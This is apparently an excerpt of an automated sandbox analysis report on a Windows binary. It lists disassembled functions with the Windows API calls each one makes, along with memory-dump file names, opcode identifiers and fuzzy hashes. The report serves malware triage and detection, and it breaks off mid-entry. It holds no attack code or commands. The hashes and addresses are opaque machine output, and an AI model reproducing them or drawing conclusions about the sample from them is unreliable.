                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: f3d6fd23587dab2ce0bcba8a0d7526177488ed82416d06b09cfae3622ce7b879
                                                                    • Instruction ID: c2e501eacf4aeeaf3b2ecc26b074df9d1281bac63d90beabd76580de8318ded4
                                                                    • Opcode Fuzzy Hash: f3d6fd23587dab2ce0bcba8a0d7526177488ed82416d06b09cfae3622ce7b879
                                                                    • Instruction Fuzzy Hash: B5312870A41319AEFB798E2D8805BFEBBEDABC5318F04429AF6D1521D9C3B985408761
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 01030C66
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 01030C82
                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 01030CE1
                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 01030D33
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 2122cd64ae6a62c36d4443172b19cff9ea63caf442598207b1e6e2f22374f437
                                                                    • Instruction ID: 71c022fb01c07929da3d898b0461f335e35f984d19a47627a8110e3e0bd5c293
                                                                    • Opcode Fuzzy Hash: 2122cd64ae6a62c36d4443172b19cff9ea63caf442598207b1e6e2f22374f437
                                                                    • Instruction Fuzzy Hash: FF31247091131CAEFF319B288808BFEBBEEAB85310F04429AF5C5521D9C379954587A2
                                                                    APIs
                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 010061FB
                                                                    • __isleadbyte_l.LIBCMT ref: 01006229
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 01006257
                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0100628D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                    • String ID:
                                                                    • API String ID: 3058430110-0
                                                                    • Opcode ID: 0432306c90cea796c7e9a51430250f73c835e692d76f17d439b1c42729a2152b
                                                                    • Instruction ID: 859efdf1c6df6fa849859b09917167d3fea7abecd5a6d0f76f973b484337062b
                                                                    • Opcode Fuzzy Hash: 0432306c90cea796c7e9a51430250f73c835e692d76f17d439b1c42729a2152b
                                                                    • Instruction Fuzzy Hash: F431C030604646AFFB228E68CC44BBA7FEABF42310F154068E9A4871E1D732D960D790
                                                                    APIs
                                                                    • GetForegroundWindow.USER32 ref: 01054F02
                                                                      • Part of subcall function 01033641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0103365B
                                                                      • Part of subcall function 01033641: GetCurrentThreadId.KERNEL32 ref: 01033662
                                                                      • Part of subcall function 01033641: AttachThreadInput.USER32(00000000,?,01035005), ref: 01033669
                                                                    • GetCaretPos.USER32(?), ref: 01054F13
                                                                    • ClientToScreen.USER32(00000000,?), ref: 01054F4E
                                                                    • GetForegroundWindow.USER32 ref: 01054F54
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                    • String ID:
                                                                    • API String ID: 2759813231-0
                                                                    • Opcode ID: 6de6cb8dbb9dc95a90e2ae9f16825993777d5afb9737aea7501f7561ebb87387
                                                                    • Instruction ID: f64cbc15592cdeaf218540a4cfa734061bc2c192e5332b525742d404f6ec95bd
                                                                    • Opcode Fuzzy Hash: 6de6cb8dbb9dc95a90e2ae9f16825993777d5afb9737aea7501f7561ebb87387
                                                                    • Instruction Fuzzy Hash: 7A312D71D00209AFCB10EFA9CC859EFB7FDEF98300F04406AE855E7241EA759E459BA0
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • GetCursorPos.USER32(?), ref: 0105C4D2
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0100B9AB,?,?,?,?,?), ref: 0105C4E7
                                                                    • GetCursorPos.USER32(?), ref: 0105C534
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0100B9AB,?,?,?), ref: 0105C56E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                    • String ID:
                                                                    • API String ID: 2864067406-0
                                                                    • Opcode ID: d2d7aa585010b9872da41cff7250efd273641b23548ddb8fc5889889502108d9
                                                                    • Instruction ID: 963e9399efa9d3c719df4751368daf419e942e240172d3710afff1ca22adc1a1
                                                                    • Opcode Fuzzy Hash: d2d7aa585010b9872da41cff7250efd273641b23548ddb8fc5889889502108d9
                                                                    • Instruction Fuzzy Hash: 8231C335500118AFEFA68F99C858EAB7FF9FB09314F044099FE858B251C7359990DFA4
                                                                    APIs
                                                                      • Part of subcall function 0102810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01028121
                                                                      • Part of subcall function 0102810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0102812B
                                                                      • Part of subcall function 0102810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0102813A
                                                                      • Part of subcall function 0102810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01028141
                                                                      • Part of subcall function 0102810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01028157
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 010286A3
                                                                    • _memcmp.LIBCMT ref: 010286C6
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010286FC
                                                                    • HeapFree.KERNEL32(00000000), ref: 01028703
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                    • String ID:
                                                                    • API String ID: 1592001646-0
                                                                    • Opcode ID: d078e9bf74c2a90231482fe75fbf54e975a6b77db88c0821c0842737cb1c8ca5
                                                                    • Instruction ID: 3efe1a40b84f556ffc97a70b0c1e722c8572d9ec2a1ce23f25292535f76e62f2
                                                                    • Opcode Fuzzy Hash: d078e9bf74c2a90231482fe75fbf54e975a6b77db88c0821c0842737cb1c8ca5
                                                                    • Instruction Fuzzy Hash: F921B031E00219EFDB20DFA8C948BEEBBF8FF55314F14809AE585A7240D735AA05CB50
                                                                    APIs
                                                                    • __setmode.LIBCMT ref: 00FF09AE
                                                                      • Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01037896,?,?,00000000), ref: 00FD5A2C
                                                                      • Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01037896,?,?,00000000,?,?), ref: 00FD5A50
                                                                    • _fprintf.LIBCMT ref: 00FF09E5
                                                                    • OutputDebugStringW.KERNEL32(?), ref: 01025DBB
                                                                      • Part of subcall function 00FF4AAA: _flsall.LIBCMT ref: 00FF4AC3
                                                                    • __setmode.LIBCMT ref: 00FF0A1A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                    • String ID:
                                                                    • API String ID: 521402451-0
                                                                    • Opcode ID: 68a5522ebf68cda0b55356b8aac5db311c718261d760e77c45c7e36804ac45f8
                                                                    • Instruction ID: 1a0a0994faf08e663ac2b126a45742171d91d88ab35ca32f585498ca0f98145d
                                                                    • Opcode Fuzzy Hash: 68a5522ebf68cda0b55356b8aac5db311c718261d760e77c45c7e36804ac45f8
                                                                    • Instruction Fuzzy Hash: EE113A3290420D6FDB04B6B49C469FFB7ADAF81320F18015AF30497293EE7C5846B7A5
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 010417A3
                                                                      • Part of subcall function 0104182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0104184C
                                                                      • Part of subcall function 0104182D: InternetCloseHandle.WININET(00000000), ref: 010418E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                    • String ID:
                                                                    • API String ID: 1463438336-0
                                                                    • Opcode ID: 91168e2b1d40d4732be7325b28cb99f323179d3b73e013cd3e141d37e5004395
                                                                    • Instruction ID: c7c0fd9061690fca2cc8b40b71d29a629276bdae7bd753f232de58cea0933057
                                                                    • Opcode Fuzzy Hash: 91168e2b1d40d4732be7325b28cb99f323179d3b73e013cd3e141d37e5004395
                                                                    • Instruction Fuzzy Hash: 272162B5200606BFEB129F64DC80FBBBBE9FF48710F10402EFA9596550DB75A45197A0
                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(?,0105FAC0), ref: 01033A64
                                                                    • GetLastError.KERNEL32 ref: 01033A73
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 01033A82
                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0105FAC0), ref: 01033ADF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2267087916-0
                                                                    • Opcode ID: 0e27cba276b936d8c6b6cfb30547bce7ace3c01b14be6335f22825b474db8f0a
                                                                    • Instruction ID: 222cec878a6c720e698986d09e0f3c573432478cace1f263002a9afdd814df4e
                                                                    • Opcode Fuzzy Hash: 0e27cba276b936d8c6b6cfb30547bce7ace3c01b14be6335f22825b474db8f0a
                                                                    • Instruction Fuzzy Hash: 9221A3745087029F8310EF28C88586B7BE8BF85264F144A5EF4D9CB292EB35D94ACB43
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 01055D80
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01055D9A
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01055DA8
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01055DB6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$AttributesLayered
                                                                    • String ID:
                                                                    • API String ID: 2169480361-0
                                                                    • Opcode ID: e8405bad225d852c2fc70b8182af0e88f18fcee3af64e111766c37463e2064f4
                                                                    • Instruction ID: 02c40e1831c54031d8c7b9da91b7d578b84e39ae4a3967da8838227ae8a60667
                                                                    • Opcode Fuzzy Hash: e8405bad225d852c2fc70b8182af0e88f18fcee3af64e111766c37463e2064f4
                                                                    • Instruction Fuzzy Hash: 2A11A232205111AFDB54AB55DC18FBB7799EF85320F084119F956C73D1C769AD01C7A4
                                                                    APIs
                                                                    • _free.LIBCMT ref: 01005101
                                                                      • Part of subcall function 00FF571C: __FF_MSGBANNER.LIBCMT ref: 00FF5733
                                                                      • Part of subcall function 00FF571C: __NMSG_WRITE.LIBCMT ref: 00FF573A
                                                                      • Part of subcall function 00FF571C: RtlAllocateHeap.NTDLL(01500000,00000000,00000001,00000000,?,?,?,00FF0DD3,?), ref: 00FF575F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0
                                                                    • Opcode ID: f43b849f1ba131092060ebd6278c946e55339c4144578df80e94fc6bdf0503f7
                                                                    • Instruction ID: 1e92b8dcce56a5df34fba5c51bde5678f32994fa1e5ad844fbc1d56e40230ab0
                                                                    • Opcode Fuzzy Hash: f43b849f1ba131092060ebd6278c946e55339c4144578df80e94fc6bdf0503f7
                                                                    • Instruction Fuzzy Hash: 1F110A72504619AEEF332F74AC056BE37D8AF443A1F104569FBC49A1E1DE3D84419F90
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00FD44CF
                                                                      • Part of subcall function 00FD407C: _memset.LIBCMT ref: 00FD40FC
                                                                      • Part of subcall function 00FD407C: _wcscpy.LIBCMT ref: 00FD4150
                                                                      • Part of subcall function 00FD407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FD4160
                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00FD4524
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FD4533
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0100D4B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1378193009-0
                                                                    • Opcode ID: 13d3f968b92e35d09888151b3a6a8607669c0a38bab4899b24b4c6dd67688e78
                                                                    • Instruction ID: 3b587ea71b847c1476df53a952fada8ab6a8d69e62518f0e0520ee03be0fb715
                                                                    • Opcode Fuzzy Hash: 13d3f968b92e35d09888151b3a6a8607669c0a38bab4899b24b4c6dd67688e78
                                                                    • Instruction Fuzzy Hash: 4021F8709043849FF7739BA49855BEBBBECAF01314F08008EE7CE56281C7792984DB51
                                                                    APIs
                                                                      • Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,01037896,?,?,00000000), ref: 00FD5A2C
                                                                      • Part of subcall function 00FD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,01037896,?,?,00000000,?,?), ref: 00FD5A50
                                                                    • gethostbyname.WSOCK32(?,?,?), ref: 01046399
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 010463A4
                                                                    • _memmove.LIBCMT ref: 010463D1
                                                                    • inet_ntoa.WSOCK32(?), ref: 010463DC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                    • String ID:
                                                                    • API String ID: 1504782959-0
                                                                    • Opcode ID: e792b5efca116c58b3d533fda110363802d2011a4f677ddfe4cc91c609a728e7
                                                                    • Instruction ID: a672375f1c9581c24411165e8ad9c26bc855e35bcd5f103f67b0665d651b4f7e
                                                                    • Opcode Fuzzy Hash: e792b5efca116c58b3d533fda110363802d2011a4f677ddfe4cc91c609a728e7
                                                                    • Instruction Fuzzy Hash: 7E11607650010AAFCB00FBA4DD96CEEB7B9AF04310B084066F545A7261DF39AE04EB61
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 01028B61
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01028B73
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01028B89
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01028BA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 36365a6ab55e68a143d4c4f0d49e30d320ec3932e5442d5298394cb03768c5f2
                                                                    • Instruction ID: 3527764936a8f1f909a5907d170eabeda850fab01383817928b34c214a39f522
                                                                    • Opcode Fuzzy Hash: 36365a6ab55e68a143d4c4f0d49e30d320ec3932e5442d5298394cb03768c5f2
                                                                    • Instruction Fuzzy Hash: 85112E79901219FFEB11DFA5CC85F9EBBB4FB48710F204096EA40B7250D6716E11DB94
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 00FD12D8
                                                                    • GetClientRect.USER32(?,?), ref: 0100B5FB
                                                                    • GetCursorPos.USER32(?), ref: 0100B605
                                                                    • ScreenToClient.USER32(?,?), ref: 0100B610
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 4127811313-0
                                                                    • Opcode ID: 99e980452e0327c16f0f583bcb448990c418bf3464d0ab9b34eb1468ab6fe35c
                                                                    • Instruction ID: 8280e26b00e24b97e83a2968ba857c7df364986ee6c7c820e1aa001646f62a42
                                                                    • Opcode Fuzzy Hash: 99e980452e0327c16f0f583bcb448990c418bf3464d0ab9b34eb1468ab6fe35c
                                                                    • Instruction Fuzzy Hash: 9A112B3550011AFBCB11EFA8D8859EF77BAFB05301F540456EA41E7240C73AAA519BA5
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0102FCED,?,01030D40,?,00008000), ref: 0103115F
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0102FCED,?,01030D40,?,00008000), ref: 01031184
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0102FCED,?,01030D40,?,00008000), ref: 0103118E
                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,0102FCED,?,01030D40,?,00008000), ref: 010311C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
